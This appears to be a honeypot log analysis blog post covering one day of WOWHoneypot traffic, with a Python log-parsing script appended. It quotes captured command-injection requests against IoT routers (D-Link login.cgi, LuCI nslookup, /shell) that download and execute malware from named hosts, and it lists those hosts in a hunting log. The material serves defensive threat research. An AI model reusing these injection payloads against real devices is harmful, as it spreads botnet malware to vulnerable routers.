S-Owl

S(ecurity)Owl

Quick analysis of WOWHoneypot (day 53)

This is a quick analysis of WOWHoneypot for 2018/07/26 (day 53 of operation).
Today's total number of accesses is 136. The full access log is below.

36 2018-07-26 GET /
4 2018-07-26 POST /qq.php
4 2018-07-26 POST /GponForm/diag_Form?images/
2 2018-07-26 PROPFIND /
2 2018-07-26 POST /zuoshou.php
2 2018-07-26 POST /yao.php
2 2018-07-26 POST /xx.php
2 2018-07-26 POST /xw.php
2 2018-07-26 POST /xw1.php
2 2018-07-26 POST /xshell.php
2 2018-07-26 POST /xiao.php
2 2018-07-26 POST /xiaoma.php
2 2018-07-26 POST /wuwu11.php
2 2018-07-26 POST /wshell.php
2 2018-07-26 POST /w.php
2 2018-07-26 POST /weixiao.php
2 2018-07-26 POST /webslee.php
2 2018-07-26 POST /wc.php
2 2018-07-26 POST /system.php
2 2018-07-26 POST /s.php
2 2018-07-26 POST /sheep.php
2 2018-07-26 POST /q.php
2 2018-07-26 POST /phpstudy.php
2 2018-07-26 POST /pe.php
2 2018-07-26 POST /mx.php
2 2018-07-26 POST /log.php
2 2018-07-26 POST /lindex.php
2 2018-07-26 POST /hm.php
2 2018-07-26 POST /feixiang.php
2 2018-07-26 POST /fack.php
2 2018-07-26 POST /defect.php
2 2018-07-26 POST /db_session.init.php
2 2018-07-26 POST /db.init.php
2 2018-07-26 POST /db__.init.php
2 2018-07-26 POST /data.php
2 2018-07-26 POST /conflg.php
2 2018-07-26 POST /cmd.php
2 2018-07-26 POST /cainiao.php
2 2018-07-26 POST /aotu.php
2 2018-07-26 POST /angge.php
2 2018-07-26 POST /ak47.php
2 2018-07-26 POST /9678.php
2 2018-07-26 GET /webdav/
2 2018-07-26 GET /shell?cd+/tmp;cd+/var;wget+hxxp://199.195.254.118/jaws+-O+lwodo;sh%+lwodo;rm+-rf+lwodo
2 2018-07-26 GET /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%20%3B%20cd%20/tmp%3Bwget%20hxxp://178.128.11.199/rvs%20-O%20/tmp/rz%3Bchmod%20777%20/tmp/rz%3Bsh%20/tmp/rz%20
1 2018-07-26 HEAD /phpmyadmin/index.php
1 2018-07-26 HEAD /phpmyadmin/%20index.php
1 2018-07-26 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://xo.alprazolam.rip/dlink%20-O%20-%3E%20/tmp/xoxo;sh%20/tmp/xoxo%27$
1 2018-07-26 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://hakaiboatnet.pw/dlink%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
1 2018-07-26 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://199.195.254.118/dlink%20-O%20-%3E%20/tmp/xd;sh%20/tmp/xd%27$
1 2018-07-26 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.172.164.41/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
1 2018-07-26 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://178.128.11.199/qtx.mips%20-O%20-%3E%20/tmp/rz;chmod%20777%20/tmp/rz;/tmp/rz%27$
1 2018-07-26 GET /login.cgi?cli=aa%20aa%27;cd%20/tmp;wget%20hxxp://178.128.11.199/qtx.mips;chmod%20777%20qtx.mips;./qtx.mips%20dlink%20%27$

Below are the access counts after excluding phpMyAdmin-related requests (4), POSTs to php (90), and requests for /.

4 2018-07-26 POST /GponForm/diag_Form?images/
2 2018-07-26 GET /webdav/
2 2018-07-26 GET /shell?cd+/tmp;cd+/var;wget+hxxp://199.195.254[.]118/jaws+-O+lwodo;sh%+lwodo;rm+-rf+lwodo
2 2018-07-26 GET /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%20%3B%20cd%20/tmp%3Bwget%20hxxp://178.128.11[.]199/rvs%20-O%20/tmp/rz%3Bchmod%20777%20/tmp/rz%3Bsh%20/tmp/rz%20
1 2018-07-26 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://xo.alprazolam.rip/dlink%20-O%20-%3E%20/tmp/xoxo;sh%20/tmp/xoxo%27$
1 2018-07-26 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://hakaiboatnet.pw/dlink%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
1 2018-07-26 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://199.195.254[.]118/dlink%20-O%20-%3E%20/tmp/xd;sh%20/tmp/xd%27$
1 2018-07-26 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.172.164[.]41/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
1 2018-07-26 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://178.128.11[.]199/qtx.mips%20-O%20-%3E%20/tmp/rz;chmod%20777%20/tmp/rz;/tmp/rz%27$
1 2018-07-26 GET /login.cgi?cli=aa%20aa%27;cd%20/tmp;wget%20hxxp://178.128.11[.]199/qtx.mips;chmod%20777%20qtx.mips;./qtx.mips%20dlink%20%27$

As yesterday, the majority are Gemini/2.0 requests targeting IoT devices.
The following one, which uses a domain name as the malware distribution location, is a new type and perhaps ought to be called "Alprazolam/2.0".

GET /login.cgi?cli=aa%20aa%27;wget%20http://xo.alprazolam.rip/dlink%20-O%20-%3E%20/tmp/xoxo;sh%20/tmp/xoxo%27$ HTTP/1.1
User-Agent: Alprazolam/2.0

Today's hunting log is below.

2 2018-07-26 wget+hxxp://199.195.254[.]118/jaws
2 2018-07-26 wget hxxp://178.128.11[.]199/rvs
2 2018-07-26 wget hxxp://178.128.11[.]199/qtx.mips
1 2018-07-26 wget hxxp://xo.alprazolam[.]rip/dlink
1 2018-07-26 wget hxxp://hakaiboatnet[.]pw/dlink
1 2018-07-26 wget hxxp://199.195.254[.]118/dlink
1 2018-07-26 wget hxxp://185.172.164[.]41/e 
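As an added example that is not part of the original post: a Python script that reproduces the two derived views in this entry (the access list with background noise removed, and the hunting log) from aggregated log lines in the "<count> <date> <method> <path>" form used above. The sample lines are constructed from the defanged request lines quoted in this entry; the function names and the noise filter are my own reading of the post's exclusions.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample in the aggregated form used in this post, from the defanged lines quoted above.
SAMPLE_LOG = """\
36 2018-07-26 GET /
4 2018-07-26 POST /qq.php
1 2018-07-26 HEAD /phpmyadmin/index.php
2 2018-07-26 GET /shell?cd+/tmp;cd+/var;wget+hxxp://199.195.254[.]118/jaws+-O+lwodo;sh%+lwodo;rm+-rf+lwodo
2 2018-07-26 GET /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%20%3B%20cd%20/tmp%3Bwget%20hxxp://178.128.11[.]199/rvs%20-O%20/tmp/rz%3Bchmod%20777%20/tmp/rz%3Bsh%20/tmp/rz%20
1 2018-07-26 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://xo.alprazolam[.]rip/dlink%20-O%20-%3E%20/tmp/xoxo;sh%20/tmp/xoxo%27$
1 2018-07-26 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://178.128.11[.]199/qtx.mips%20-O%20-%3E%20/tmp/rz;chmod%20777%20/tmp/rz;/tmp/rz%27$
1 2018-07-26 GET /login.cgi?cli=aa%20aa%27;cd%20/tmp;wget%20hxxp://178.128.11[.]199/qtx.mips;chmod%20777%20qtx.mips;./qtx.mips%20dlink%20%27$
"""

# Fetch command followed by a URL; stops at whitespace, ';' or a quote so the rest of the injected shell is left out.
FETCH_URL = re.compile(r"\b(?:wget|curl)\s+((?:https?|hxxps?)://[^\s;'\"]+)")
URL_PARTS = re.compile(r"^(https?|hxxps?)://([^/]+)(.*)$")


def parse_lines(text):
    """Yield (count, date, method, path) for each non-empty aggregated log line."""
    for line in text.splitlines():
        if line.strip():
            count, date, method, path = line.split(maxsplit=3)
            yield int(count), date, method, path


def is_background_noise(method, path):
    """The post's own exclusions: requests for '/', phpMyAdmin probes and POSTs to *.php."""
    p = path.lower()
    return p == "/" or p.startswith("/phpmyadmin") or (method == "POST" and p.endswith(".php"))


def filter_noise(text):
    return [e for e in parse_lines(text) if not is_background_noise(e[2], e[3])]


def defang(url):
    """Rewrite the scheme to hxxp and bracket the last dot of the host; idempotent."""
    scheme, host, rest = URL_PARTS.match(url).groups()  # FETCH_URL guarantees scheme://host form
    head, sep, tail = host.replace("[.]", ".").rpartition(".")
    host = f"{head}[.]{tail}" if sep else host
    return scheme.replace("http", "hxxp") + "://" + host + rest


def hunting_log(text):
    """Sum request counts per defanged download URL found in the decoded request paths."""
    totals = Counter()
    for count, _date, _method, path in parse_lines(text):
        for url in FETCH_URL.findall(unquote_plus(path)):
            totals[defang(url)] += count
    return dict(sorted(totals.items(), key=lambda kv: (-kv[1], kv[0])))
```

Running hunting_log(SAMPLE_LOG) gives the same per-URL totals as the hunting log above, which is useful when the same payload host appears in several different exploit paths.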

That is all.